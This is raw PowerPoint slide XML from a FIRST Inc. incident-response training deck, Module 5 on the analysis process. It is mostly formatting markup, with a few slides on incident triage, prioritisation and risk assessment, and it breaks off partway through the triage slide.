            <a:ext cx="8258175" cy="4305935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F38127"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
                <a:sym typeface="Merriweather Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="220265" marR="0" lvl="1" indent="-105965" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans"/>
                <a:ea typeface="Merriweather Sans"/>
                <a:cs typeface="Merriweather Sans"/>
                <a:sym typeface="Merriweather Sans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="603647" marR="0" lvl="2" indent="-226219" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans"/>
                <a:ea typeface="Merriweather Sans"/>
                <a:cs typeface="Merriweather Sans"/>
                <a:sym typeface="Merriweather Sans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="815579" marR="0" lvl="3" indent="-97631" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans"/>
                <a:ea typeface="Merriweather Sans"/>
                <a:cs typeface="Merriweather Sans"/>
                <a:sym typeface="Merriweather Sans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1543050" marR="0" lvl="4" indent="-57150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="595959"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1885950" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2228850" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="2571750" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="2914650" marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36819801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Questions">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476250" y="336551"/>
            <a:ext cx="1473288" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Questions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4413" y="1118294"/>
            <a:ext cx="5460709" cy="4737165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25021868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3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 10"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="365126"/>
            <a:ext cx="8292704" cy="879475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0"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1pPr>
            <a:lvl2pPr marL="0" marR="0" lvl="1"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2pPr>
            <a:lvl3pPr marL="0" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="0" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="0" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="342900" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="685800" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="1028700" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="1371600" marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1479551"/>
            <a:ext cx="8292704" cy="4703763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="171450" marR="0" lvl="0" indent="-38100" algn="l" rtl="0">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1pPr>
            <a:lvl2pPr marL="514350" marR="0" lvl="1" indent="-5715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2pPr>
            <a:lvl3pPr marL="857250" marR="0" lvl="2" indent="-7620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200150" marR="0" lvl="3" indent="-5715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1543050" marR="0" lvl="4" indent="-5715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1885950" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2228850" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="2571750" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="2914650" marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Shape 14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId14">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619999" y="6070974"/>
            <a:ext cx="1282305" cy="737813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2EAF601-FACC-DA4C-83CF-34126ED4DA4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6624638"/>
            <a:ext cx="5111750" cy="214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tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="914400" algn="l"/>
                <a:tab pos="1371600" algn="l"/>
                <a:tab pos="1828800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2743200" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
                <a:tab pos="3657600" algn="l"/>
                <a:tab pos="4114800" algn="l"/>
                <a:tab pos="4572000" algn="l"/>
                <a:tab pos="5029200" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="914400" algn="l"/>
                <a:tab pos="1371600" algn="l"/>
                <a:tab pos="1828800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2743200" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
                <a:tab pos="3657600" algn="l"/>
                <a:tab pos="4114800" algn="l"/>
                <a:tab pos="4572000" algn="l"/>
                <a:tab pos="5029200" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="914400" algn="l"/>
                <a:tab pos="1371600" algn="l"/>
                <a:tab pos="1828800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2743200" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
                <a:tab pos="3657600" algn="l"/>
                <a:tab pos="4114800" algn="l"/>
                <a:tab pos="4572000" algn="l"/>
                <a:tab pos="5029200" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="914400" algn="l"/>
                <a:tab pos="1371600" algn="l"/>
                <a:tab pos="1828800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2743200" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
                <a:tab pos="3657600" algn="l"/>
                <a:tab pos="4114800" algn="l"/>
                <a:tab pos="4572000" algn="l"/>
                <a:tab pos="5029200" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="914400" algn="l"/>
                <a:tab pos="1371600" algn="l"/>
                <a:tab pos="1828800" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2743200" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
                <a:tab pos="3657600" algn="l"/>
                <a:tab pos="4114800" algn="l"/>
                <a:tab pos="4572000" algn="l"/>
                <a:tab pos="5029200" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="29718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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="34290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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="38862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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Training Module 5: Research the Analysis Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Version 1.5, © FIRST Inc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1944507803"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="dk2" tx2="lt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80" r:id="rId11"/>
  </p:sldLayoutIdLs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None/>
        <a:defRPr sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Calibri" charset="0"/>
          <a:ea typeface="Calibri" charset="0"/>
          <a:cs typeface="Calibri" charset="0"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl1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None/>
        <a:defRPr sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Calibri" charset="0"/>
          <a:ea typeface="Calibri" charset="0"/>
          <a:cs typeface="Calibri" charset="0"/>
          <a:sym typeface="Arial"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marR="0" lvl="1"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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E96169B-A51F-C04B-912D-5D2D468E199F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="3646488"/>
            <a:ext cx="5408613" cy="7032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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Module 5: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Research the Analysis Process </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7170" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{568247ED-1079-D041-A97F-749A672185C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="4619625"/>
            <a:ext cx="4875213" cy="912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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[name]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[date]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20E73920-294B-744D-BC2F-F2DD64A3AC54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Triage Constantly in the Background </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23554" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8945ED95-3DF7-4649-A6B8-ACD43F5662D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prioritization of incidents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Determined by severity for your constituency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Perform a risk assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What resources are being affected? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
